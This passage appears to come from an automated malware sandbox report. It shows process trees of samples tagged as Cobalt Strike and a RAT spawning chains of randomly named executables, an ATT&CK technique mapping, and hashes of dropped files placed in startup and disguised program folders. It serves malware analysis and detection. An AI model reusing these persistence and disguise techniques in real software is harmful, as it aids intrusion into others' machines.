        C:\Windows\system32\Maoifh32.exe
        11⤵
        
        PID:8176
        
        C:\Windows\SysWOW64\Mafofggd.exe
        
        C:\Windows\system32\Mafofggd.exe
        12⤵
        
        PID:5500
        
        C:\Windows\SysWOW64\Ndlacapp.exe
        
        C:\Windows\system32\Ndlacapp.exe
        13⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\Nocbfjmc.exe
        
        C:\Windows\system32\Nocbfjmc.exe
        14⤵
        
        PID:6972
        
        C:\Windows\SysWOW64\Nhlfoodc.exe
        
        C:\Windows\system32\Nhlfoodc.exe
        15⤵
        
        PID:5904
        
        C:\Windows\SysWOW64\Okfbgiij.exe
        
        C:\Windows\system32\Okfbgiij.exe
        16⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\Pbgqdb32.exe
        
        C:\Windows\system32\Pbgqdb32.exe
        17⤵
        
        PID:7268
        
        C:\Windows\SysWOW64\Abcppq32.exe
        
        C:\Windows\system32\Abcppq32.exe
        18⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\Amkabind.exe
        
        C:\Windows\system32\Amkabind.exe
        19⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\Bejobk32.exe
        
        C:\Windows\system32\Bejobk32.exe
        20⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\Bcpika32.exe
        
        C:\Windows\system32\Bcpika32.exe
        21⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\Bfabmmhe.exe
        
        C:\Windows\system32\Bfabmmhe.exe
        22⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\Dpgbgpbe.exe
        
        C:\Windows\system32\Dpgbgpbe.exe
        23⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\Ddekmo32.exe
        
        C:\Windows\system32\Ddekmo32.exe
        24⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\Ddhhbngi.exe
        
        C:\Windows\system32\Ddhhbngi.exe
        25⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\Epcbbohh.exe
        
        C:\Windows\system32\Epcbbohh.exe
        26⤵
        
        PID:7000
        
        C:\Windows\SysWOW64\Edfddl32.exe
        
        C:\Windows\system32\Edfddl32.exe
        27⤵
        
        PID:6676
        
        C:\Windows\SysWOW64\Fcpkph32.exe
        
        C:\Windows\system32\Fcpkph32.exe
        28⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\Gddqejni.exe
        
        C:\Windows\system32\Gddqejni.exe
        29⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\Hnmnengg.exe
        
        C:\Windows\system32\Hnmnengg.exe
        30⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\Hjcojo32.exe
        
        C:\Windows\system32\Hjcojo32.exe
        31⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\Icnphd32.exe
        
        C:\Windows\system32\Icnphd32.exe
        32⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\Igneda32.exe
        
        C:\Windows\system32\Igneda32.exe
        33⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\Jfmekm32.exe
        
        C:\Windows\system32\Jfmekm32.exe
        34⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\Kjmjgk32.exe
        
        C:\Windows\system32\Kjmjgk32.exe
        35⤵
        
        PID:6176
        
        C:\Windows\SysWOW64\Khfdlnab.exe
        
        C:\Windows\system32\Khfdlnab.exe
        36⤵
        
        PID:3244
- - C:\Users\Admin\Downloads\240919-hh4g4awaja1b779f0f654c7eb6205a1c9ee6d26c131ca8afb26ae97c6e04c85d56b8499e4f.exe
    C:\Users\Admin\Downloads\240919-hh4g4awaja1b779f0f654c7eb6205a1c9ee6d26c131ca8afb26ae97c6e04c85d56b8499e4f.exe
    3⤵
    PID:876
- - C:\Users\Admin\Downloads\240919-hjc2jawajg7cc4e9e08b229b8769443bcd29e8473a852f674e57f8755c10e7a8d0a825b356N.exe
    C:\Users\Admin\Downloads\240919-hjc2jawajg7cc4e9e08b229b8769443bcd29e8473a852f674e57f8755c10e7a8d0a825b356N.exe
    3⤵
    PID:6696
- - C:\Users\Admin\Downloads\240919-hh2y9svhrgeac8e88f9559cb19546a0a744357d2e4_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hh2y9svhrgeac8e88f9559cb19546a0a744357d2e4_JaffaCakes118.exe
    3⤵
    PID:7864
- - C:\Users\Admin\Downloads\240919-hhya3swcjr2024-09-19_0e2de2117b9c55de3956f645b559e7c7_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hhya3swcjr2024-09-19_0e2de2117b9c55de3956f645b559e7c7_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:7576
- - C:\Users\Admin\Downloads\240919-hh2cqswckne69d1d83a7e7338939f7873f44ac202d27cabc56310bcef2d8e5281a8297bf01N.exe
    C:\Users\Admin\Downloads\240919-hh2cqswckne69d1d83a7e7338939f7873f44ac202d27cabc56310bcef2d8e5281a8297bf01N.exe
    3⤵
    PID:6764
  - - C:\Windows\SysWOW64\Bpemkcck.exe
      C:\Windows\system32\Bpemkcck.exe
      4⤵
      PID:6992
    - - C:\Windows\SysWOW64\Dpgbgpbe.exe
        
        C:\Windows\system32\Dpgbgpbe.exe
        5⤵
        
        PID:6116
      - C:\Windows\SysWOW64\Dmnpfd32.exe
        
        C:\Windows\system32\Dmnpfd32.exe
        6⤵
        
        PID:7976
        
        C:\Windows\SysWOW64\Dekapfke.exe
        
        C:\Windows\system32\Dekapfke.exe
        7⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\Edoncm32.exe
        
        C:\Windows\system32\Edoncm32.exe
        8⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\Eincadmf.exe
        
        C:\Windows\system32\Eincadmf.exe
        9⤵
        
        PID:3832
        
        C:\Windows\SysWOW64\Fcpkph32.exe
        
        C:\Windows\system32\Fcpkph32.exe
        10⤵
        
        PID:6328
- - C:\Users\Admin\Downloads\240919-hhlx2svhqdeac88f439a17a1635e4aec685607c00c_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hhlx2svhqdeac88f439a17a1635e4aec685607c00c_JaffaCakes118.exe
    3⤵
    PID:6724
- - C:\Users\Admin\Downloads\240919-hhkd8awbrr2024-09-19_0d51b9c6a2137d589c2d6399ac2ce542_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hhkd8awbrr2024-09-19_0d51b9c6a2137d589c2d6399ac2ce542_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:7648
- - C:\Users\Admin\Downloads\240919-hhfq2avhpca497c81c5708c4fd10e69f917b6ffedaff62aedc27bd6c3bdbf2f1348c360e08N.exe
    C:\Users\Admin\Downloads\240919-hhfq2avhpca497c81c5708c4fd10e69f917b6ffedaff62aedc27bd6c3bdbf2f1348c360e08N.exe
    3⤵
    PID:5516
  - - C:\Windows\SysWOW64\Hgnlmdcp.exe
      C:\Windows\system32\Hgnlmdcp.exe
      4⤵
      PID:3460
    - - C:\Windows\SysWOW64\Hnjaonij.exe
        
        C:\Windows\system32\Hnjaonij.exe
        5⤵
        
        PID:6872
      - C:\Windows\SysWOW64\Hqkjaifk.exe
        
        C:\Windows\system32\Hqkjaifk.exe
        6⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\Hqmggi32.exe
        
        C:\Windows\system32\Hqmggi32.exe
        7⤵
        
        PID:7492
        
        C:\Windows\SysWOW64\Ifmldo32.exe
        
        C:\Windows\system32\Ifmldo32.exe
        8⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\Ijjekn32.exe
        
        C:\Windows\system32\Ijjekn32.exe
        9⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\Icefib32.exe
        
        C:\Windows\system32\Icefib32.exe
        10⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\Jmdqbg32.exe
        
        C:\Windows\system32\Jmdqbg32.exe
        11⤵
        
        PID:4272
        
        C:\Windows\SysWOW64\Jmijnfgd.exe
        
        C:\Windows\system32\Jmijnfgd.exe
        12⤵
        
        PID:7264
        
        C:\Windows\SysWOW64\Kjmjgk32.exe
        
        C:\Windows\system32\Kjmjgk32.exe
        13⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\Kjbdbjbi.exe
        
        C:\Windows\system32\Kjbdbjbi.exe
        14⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\Kejeebpl.exe
        
        C:\Windows\system32\Kejeebpl.exe
        15⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\Lhmjlm32.exe
        
        C:\Windows\system32\Lhmjlm32.exe
        16⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\Ldckan32.exe
        
        C:\Windows\system32\Ldckan32.exe
        17⤵
        
        PID:7420
        
        C:\Windows\SysWOW64\Mkdiog32.exe
        
        C:\Windows\system32\Mkdiog32.exe
        18⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\Mhkgnkoj.exe
        
        C:\Windows\system32\Mhkgnkoj.exe
        19⤵
        
        PID:852
        
        C:\Windows\SysWOW64\Mdagbl32.exe
        
        C:\Windows\system32\Mdagbl32.exe
        20⤵
        
        PID:6368
        
        C:\Windows\SysWOW64\Nefmgogl.exe
        
        C:\Windows\system32\Nefmgogl.exe
        21⤵
        
        PID:9832
        
        C:\Windows\SysWOW64\Ononmo32.exe
        
        C:\Windows\system32\Ononmo32.exe
        22⤵
        
        PID:14640
        
        C:\Windows\SysWOW64\Pnfdnnbo.exe
        
        C:\Windows\system32\Pnfdnnbo.exe
        23⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\Qkchna32.exe
        
        C:\Windows\system32\Qkchna32.exe
        24⤵
        
        PID:12676
        
        C:\Windows\SysWOW64\Anijjkbj.exe
        
        C:\Windows\system32\Anijjkbj.exe
        25⤵
        
        PID:17740
        
        C:\Windows\SysWOW64\Bpaikm32.exe
        
        C:\Windows\system32\Bpaikm32.exe
        26⤵
        
        PID:13260
        
        C:\Windows\SysWOW64\Becknc32.exe
        
        C:\Windows\system32\Becknc32.exe
        27⤵
        
        PID:15316
        
        C:\Windows\SysWOW64\Cicqja32.exe
        
        C:\Windows\system32\Cicqja32.exe
        28⤵
        
        PID:17304
        
        C:\Windows\SysWOW64\Ebagdddp.exe
        
        C:\Windows\system32\Ebagdddp.exe
        29⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\Eipilmgh.exe
        
        C:\Windows\system32\Eipilmgh.exe
        30⤵
        
        PID:8096
        
        C:\Windows\SysWOW64\Fpnkdfko.exe
        
        C:\Windows\system32\Fpnkdfko.exe
        31⤵
        
        PID:10068
        
        C:\Windows\SysWOW64\Gohapb32.exe
        
        C:\Windows\system32\Gohapb32.exe
        32⤵
        
        PID:8548
        
        C:\Windows\SysWOW64\Gpjjpe32.exe
        
        C:\Windows\system32\Gpjjpe32.exe
        33⤵
        
        PID:17176
        
        C:\Windows\SysWOW64\Hfniikha.exe
        
        C:\Windows\system32\Hfniikha.exe
        34⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\Hgpbhmna.exe
        
        C:\Windows\system32\Hgpbhmna.exe
        35⤵
        
        PID:12316
        
        C:\Windows\SysWOW64\Hhehkepj.exe
        
        C:\Windows\system32\Hhehkepj.exe
        36⤵
        
        PID:13604
- - C:\Users\Admin\Downloads\240919-hg7hcsvhnf2024-09-19_0cc2138dce5f268ff96d6d7ac48050ef_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hg7hcsvhnf2024-09-19_0cc2138dce5f268ff96d6d7ac48050ef_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:2444
- - C:\Users\Admin\Downloads\240919-hg67lawbqp698dc569edf5a79919ba4eb232f6d73022582ca7cbb4df42fcabbc39510bbedfN.exe
    C:\Users\Admin\Downloads\240919-hg67lawbqp698dc569edf5a79919ba4eb232f6d73022582ca7cbb4df42fcabbc39510bbedfN.exe
    3⤵
    PID:5520
  - - C:\Windows\SysWOW64\Jghhjq32.exe
      C:\Windows\system32\Jghhjq32.exe
      4⤵
      PID:7880
    - - C:\Windows\SysWOW64\Khonkogj.exe
        
        C:\Windows\system32\Khonkogj.exe
        5⤵
        
        PID:728
      - C:\Windows\SysWOW64\Kebodc32.exe
        
        C:\Windows\system32\Kebodc32.exe
        6⤵
        
        PID:6500
        
        C:\Windows\SysWOW64\Khcgfo32.exe
        
        C:\Windows\system32\Khcgfo32.exe
        7⤵
        
        PID:828
        
        C:\Windows\SysWOW64\Kanidd32.exe
        
        C:\Windows\system32\Kanidd32.exe
        8⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\Ldanloba.exe
        
        C:\Windows\system32\Ldanloba.exe
        9⤵
        
        PID:7788
        
        C:\Windows\SysWOW64\Leqkeajd.exe
        
        C:\Windows\system32\Leqkeajd.exe
        10⤵
        
        PID:6744
        
        C:\Windows\SysWOW64\Meoggpmd.exe
        
        C:\Windows\system32\Meoggpmd.exe
        11⤵
        
        PID:7828
        
        C:\Windows\SysWOW64\Nolekd32.exe
        
        C:\Windows\system32\Nolekd32.exe
        12⤵
        
        PID:9780
        
        C:\Windows\SysWOW64\Naokbokn.exe
        
        C:\Windows\system32\Naokbokn.exe
        13⤵
        
        PID:13128
        
        C:\Windows\SysWOW64\Okneldkf.exe
        
        C:\Windows\system32\Okneldkf.exe
        14⤵
        
        PID:14564
        
        C:\Windows\SysWOW64\Paocim32.exe
        
        C:\Windows\system32\Paocim32.exe
        15⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\Pdbiphhi.exe
        
        C:\Windows\system32\Pdbiphhi.exe
        16⤵
        
        PID:8824
        
        C:\Windows\SysWOW64\Pbifol32.exe
        
        C:\Windows\system32\Pbifol32.exe
        17⤵
        
        PID:10452
        
        C:\Windows\SysWOW64\Qbmpjkqk.exe
        
        C:\Windows\system32\Qbmpjkqk.exe
        18⤵
        
        PID:12628
        
        C:\Windows\SysWOW64\Aofjoo32.exe
        
        C:\Windows\system32\Aofjoo32.exe
        19⤵
        
        PID:17712
        
        C:\Windows\SysWOW64\Bfpkbfdi.exe
        
        C:\Windows\system32\Bfpkbfdi.exe
        20⤵
        
        PID:15348
        
        C:\Windows\SysWOW64\Cfedmfqd.exe
        
        C:\Windows\system32\Cfedmfqd.exe
        21⤵
        
        PID:17340
        
        C:\Windows\SysWOW64\Cemndbci.exe
        
        C:\Windows\system32\Cemndbci.exe
        22⤵
        
        PID:15632
        
        C:\Windows\SysWOW64\Eoekde32.exe
        
        C:\Windows\system32\Eoekde32.exe
        23⤵
        
        PID:13308
        
        C:\Windows\SysWOW64\Flpbnh32.exe
        
        C:\Windows\system32\Flpbnh32.exe
        24⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\Fpqgjf32.exe
        
        C:\Windows\system32\Fpqgjf32.exe
        25⤵
        
        PID:8912
        
        C:\Windows\SysWOW64\Gpgnjebd.exe
        
        C:\Windows\system32\Gpgnjebd.exe
        26⤵
        
        PID:8492
        
        C:\Windows\SysWOW64\Gckcap32.exe
        
        C:\Windows\system32\Gckcap32.exe
        27⤵
        
        PID:13228
        
        C:\Windows\SysWOW64\Hhobjf32.exe
        
        C:\Windows\system32\Hhobjf32.exe
        28⤵
        
        PID:10264
        
        C:\Windows\SysWOW64\Ioppho32.exe
        
        C:\Windows\system32\Ioppho32.exe
        29⤵
        
        PID:13644
        
        C:\Windows\SysWOW64\Ifnbph32.exe
        
        C:\Windows\system32\Ifnbph32.exe
        30⤵
        
        PID:7512
        
        C:\Windows\SysWOW64\Jjqdafmp.exe
        
        C:\Windows\system32\Jjqdafmp.exe
        31⤵
        
        PID:9092
- - C:\Users\Admin\Downloads\240919-hgpybavhmdeac7e6e96b3fd2185b7bbddb0d2d7d7b_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hgpybavhmdeac7e6e96b3fd2185b7bbddb0d2d7d7b_JaffaCakes118.exe
    3⤵
    PID:6512
  - - C:\Users\Admin\eosRo6jbz1.exe
      C:\Users\Admin\eosRo6jbz1.exe
      4⤵
      PID:748
- - C:\Users\Admin\Downloads\240919-hgtaqswbpq2024-09-19_0c546c996e815d799a63214a206ae6ba_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hgtaqswbpq2024-09-19_0c546c996e815d799a63214a206ae6ba_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:7516
- - C:\Users\Admin\Downloads\240919-hgb2fswbnl2024-09-19_099368f9fe6fd97b9a8a8cdad39a8a96_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hgb2fswbnl2024-09-19_099368f9fe6fd97b9a8a8cdad39a8a96_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:9828
- - C:\Users\Admin\Downloads\240919-hgatdsvhkheac79cdb7f97cd5e8dd28a23a31dc4e1_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hgatdsvhkheac79cdb7f97cd5e8dd28a23a31dc4e1_JaffaCakes118.exe
    3⤵
    PID:13576
- - C:\Users\Admin\Downloads\240919-hf9w4awbnjeac78ab49419bf5186dd303311376041_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hf9w4awbnjeac78ab49419bf5186dd303311376041_JaffaCakes118.exe
    3⤵
    PID:14508
- - C:\Users\Admin\Downloads\240919-hfpadswblkeac71a57b0528af9106fe5dc5a76eaa0_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hfpadswblkeac71a57b0528af9106fe5dc5a76eaa0_JaffaCakes118.exe
    3⤵
    PID:9464
- - C:\Users\Admin\Downloads\240919-hfx8asvhjed19b49c55816b6ffc9fc0739348ee233a3de0d98611a18f3ed79398c095b668cN.exe
    C:\Users\Admin\Downloads\240919-hfx8asvhjed19b49c55816b6ffc9fc0739348ee233a3de0d98611a18f3ed79398c095b668cN.exe
    3⤵
    PID:9088

C:\Windows\SysWOW64\tcpip.exe
C:\Windows\SysWOW64\tcpip.exe
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6388 -ip 6388
1⤵
PID:6064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1644 -ip 1644
1⤵
PID:5184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6088 -ip 6088
1⤵
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4368 -ip 4368
1⤵
PID:5772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3400 -ip 3400
1⤵
PID:6424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5456 -ip 5456
1⤵
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 13604 -ip 13604
1⤵
PID:13164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Network Share Discovery

T1135

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Aut0exec.bat

Filesize
323KB

MD5
6a36d47fc7a23679cae0c478341bdd52

SHA1
4c1c5047f777e474abff65d842dc8bf1958c3e67

SHA256
b1bcc175fae539f436a4539631faa1bd2dd7adf8746529047f788ded6eca3cca

SHA512
c193793fa08566c5e4b44e64559e0c1a8b77bec3e9f6553b83aa3ea4342ffb590d699e83e87b174ce8798d12ab96b21ba3c01d22bb4e13b1246fa7594a6fa626

Download Submit
C:\Aut0exec.bat

Filesize
323KB

MD5
b6ba8113d00a096e4f09c8ad0bc337a0

SHA1
f38283cb3635e134368c2e57f110f102a54783f0

SHA256
bc322768b8ec282753c0325610cda02b2cc6ff94a054de132cf9c86e7587b0c6

SHA512
8af3d1c89a2c24a566ece374ca6226934c7ec2268999db6d49dd4e39e5c19a5e041103d010a850369a5857e7e7ad11975db025bafe2b86671a50f9b8ab633a44

Download Submit
C:\Aut0exec.bat

Filesize
323KB

MD5
1346448d50bb59603daad957080c4dac

SHA1
dc830920008a52ade365e966677f58a834121f76

SHA256
6aa8a9f0c9c2da0b92df10919961b93f0f92f72b7913936e58c70d814d07b987

SHA512
5aadda63db5e074a01bb44096e52b10f218f0d3ab63fb88f2aa35557fec1fc2bf06cf4c44a71b0d6f380cd5d722b85f8da262cacb9ce08d7cce0c1e8051e8d66

Download Submit
C:\Aut0exec.bat

Filesize
323KB

MD5
7003ace27068aedeb4332e8489cd8642

SHA1
9a883edae184bde51f945491f06bc5f83248626b

SHA256
8579aa01bea557787f74586d006ec8699786869504e369e401247666ef8ee18f

SHA512
99c50d8c7e72fb6e8aa015f158f3961e70ff6a27b3b7a0963a786b3540683e299fbc795dda218952644b49aafb676c37b5090e519ba2bd1f9047f0c12660a7b7

Download Submit
C:\Aut0exec.bat.tmp

Filesize
323KB

MD5
dbceba8222a022148e06310f8c864c6d

SHA1
8acdd2bcaf62a26d3e5b9620e4551b2ce51223e9

SHA256
8a21f5bfb94260f5cda4f295452719983723f402180054a91ed5c534de6e63c6

SHA512
20189e6e18615938b05db99816485b7d960ccc7550acd96b4469f0bb52380ccbd5fdf0cc96925cfc24589221834098f74dd181417bd4800d86b24da78774e534

Download Submit
C:\Aut0exec.bat.tmp

Filesize
323KB

MD5
6c6f4b5041801599c2ca26b5fe18cba0

SHA1
3b43e24fa818795f6336efa50c6b4401c22a934d

SHA256
5ef642ad733f61dc46e1079623b0488e6572d3e29b0ee9411d00bfdb233e2d66

SHA512
04a01837d5d446d1c0dd5728c0b0cc870cb5f00d5de3dda84bba9dca7df72e62434d807c63bbc6bec2190f2c766513f71041c58ab2de1f696ad178491e09bf17

Download Submit
C:\Aut0exec.bat.tmp

Filesize
323KB

MD5
a1180549b4f12932871bd872a1bec966

SHA1
3cd49f874372a94cba78811703b8a2575cee29fd

SHA256
b6b53515569faf9cbc81d7afc6598803cb118588965efe4ea55c9ad15ef1ad8b

SHA512
0898ccd1f08a125859d475eceed333825d1c5f45bd1cb16b7ba07694b91133b5e105a8914eb619a3f5b29b91799239ab8a8e55b9305b5a642b654fb6da24e7b9

Download Submit
C:\Aut0exec.bat.tmp

Filesize
323KB

MD5
f01c6de4655a5854b40aa0690daec1dd

SHA1
fff3a287b94a001712f238a963836a3bb97df148

SHA256
291ddf0e739458d80ad069fab9ad5675b039f0d85cdf32cb5714bf7c401bb323

SHA512
fe17c268541f558fe82c7bc34bc9946d75c2282dba8219c863f47d4488355d82db4585b51404042ccaf1271cad294c45b255718441e40e8de6360d50c80e1988

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\backup.exe

Filesize
4B

MD5
c350576b8493473ce391d8ae123124ff

SHA1
635c190d97a98900384d41bd2fd49998b29b65bd

SHA256
e606a91aef41612231a0340e25dc573e0ad879c629e145f95e14aa6b2cfa23f9

SHA512
c6d446546d9e07cc289ac1d1a81e4a590deadfc5faf0649aac2f0a5c7f3e86561a0f8e189812f784bdd9ee444b7f1cd2aa346b9ca925d4a7c6ed8893fb2ecc3e

Download Submit
C:\Program Files (x86)\backup.exe

Filesize
2B

MD5
ccedcfc8c643e26dc7e5fe642e3cf377

SHA1
aa5df26c9be0a70fe8bf023d879ade29c5d6a120

SHA256
195f58bc6d6b7b36335c95e08343825a7ae6f30437b4a7e6fa7b89d76907570a

SHA512
993d1b1982eac3e60d9c33e5e89c6be185d77bb95d16180e033e3a3466eb57136e083bd3e94628f3da39ff70dca014142e35a67d1e824af457495d26642ab4a5

Download Submit
C:\Program Files\Common Files\microsoft shared\MSInfo\Se101.exe

Filesize
297KB

MD5
eac5f9ced24648bc518ee971ee16574c

SHA1
d64bfbc45844cae92d68bfc191cb3d21c38932f1

SHA256
933d3e7874fda20f8772409be85f9aa75e925ad97be98b9020ff1f9f43297cd4

SHA512
fb04a6fef38f79d3abe5d2d842cd30d42350eef759e30e2408236c5d5ed2196003eef954b9620b02402dcbb6c08bbeb61001d0f57be02b8970dc12feeab9a24c

Download Submit
C:\Program Files\Microsoft Office 15\backup.exe

Filesize
2B

MD5
393de2b027e1f15c0fefe713b3bf2fd4

SHA1
76fa5a5caddef926d4554be1c632e6ab8a04f1fa

SHA256
db3426e878068d28d269b6c87172322ce5372b65756d0789001d34835f601c03

SHA512
8f0754f174e2f56b90deef3fb910f0ce33ba432dfe9b43b4f6bef70b0b32f716f331e7236f45a66bc09a26246ac0c37f13a95cd5f5f46ab72ed04dbfd2973cc3

Download Submit
C:\Program Files\Windows Defender\update.exe

Filesize
2B

MD5
e4390eb627e0ef7a50aa60230c7c1f12

SHA1
d4b2a096b3f5a4ed520d606ebc6fdcf53d018b94

SHA256
2215e8ac4e2b871c2a48189e79738c956c081e23ac2f2415bf77da199dfd920c

SHA512
ab441a3d4f41f2b731901ddd34a70fd6fe48bd34cd569653af55cf738213b62fd824113bd8cdb9ad367f8834dafadc61bc59284efbd874cb697e3d3ff7f9925e

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Empty.pif

Filesize
323KB

MD5
6315a4711e70f074ce01fede57d4f594

SHA1
0cffae7f087bc2157ace6d5753c799dd196c7d02

SHA256
308d7aeb6b6da118307da18bfcf4f25c771d89a126e961c7bb1ffc292db8680f

SHA512
8276590fec52292c3a05a84a2a79da453b5895ae6893ca22dd5b77ff0bcb8bf8dcc7620e86fc2fd90d02e4af6b81fdaa9b8f4f338ce14b749cca1711b3349bf7

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Empty.pif

Filesize
91KB

MD5
2bde5b0f373cd81f12f024a946ae3900

SHA1
de17b8c314c99eddbc2e6755f6db8e1a5a9a7ed0

SHA256
53713370c4f9fb2d9280195fb93ca7764f31f4731043d7dbce6e232e8cf8edcd

SHA512
4b69c30e80a1b6dddb2d4ef032dcc051b6785d9eb26260d4396bf1d7d12fe9afcabaf5a362288a13ae08f3af4c930de5193f2e3907320ba43c98227568695be3

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Empty.pif

Filesize
323KB

MD5
f2ec863c692b5a29ac2db0f4779be905

SHA1
de6572c7ea380e31df3dd90894829b07128cb15b

SHA256
b5808136653fb45815a209ed80980b822e562d5ca69dc8a240dd766a213439e2

SHA512
bd0a18159a74fbfdf491a573d6c471aa10bcdbd62f881e74e3016976135bbc20e0b60119d4b642712b7840c1fb89049fa8b25a4c772ad2cd9ba2ac70df4e6070

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Empty.pif.tmp

Filesize
323KB

MD5
ce4dd44e45819a3045acad53285f7b2e

SHA1
e3b604daee8114604607edf022e01333e7d81117

SHA256
d8966b57509ec7e11fa6381512102084203d3121c6b50dfddf4909e7ff317cf3

SHA512
0d363be90666b2610707bd255d92b701b5912fcb2d0aa2306f6905d282cffd5fa7fdbe2d222797acc656fd1588cbfbdfea8a10cfeacc005ccb2717449eac912c

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Empty.pif.tmp

Filesize
323KB

MD5
25d62acd1a5cb40c97ad34fff754e25b

SHA1
a29132fa40632f9cf5ec8a79473376cc83845bf9

SHA256
0b976b160dad9628b02bde6bcd826c95e3f6ee8c74b9661883bfad6940d47056

SHA512
33298ffa1e33ed7df135c2902df9f4b426ca37ec22b648084ce58072b95ec253bb026444c8b9964cb65669c9f2b83a51db60c9f321ab333863bac778cf22d1cc

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Empty.pif.tmp

Filesize
323KB

MD5
3a4b728d6fcaa9184f787f491cb356b3

SHA1
5cc5908cae773eba88f5ae9a05c37c30826e464d

SHA256
eec27483d1ac3de8e43b9c36bdbdf4ea6b2407eb7c06b970c0bbe3f3bbf345c8

SHA512
3e72ae2d79b1854b1bf36ea433cdf95f13dd30f5920af6bf5f04c2b034f427ba9111e4eb4560c04712d4f0308452c72ddcfff5573228edbe53ae813a252d2997

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Empty.pif.tmp

Filesize
323KB

MD5
12477a2c2b5198aa8a2f1848d6f4a45e

SHA1
764d44b39b2fded40925411c75e1e7dfa5ba2959

SHA256
34250bc554d21e7c2a10265ee5aa3d5b357245eb470c16711790f997792d685c

SHA512
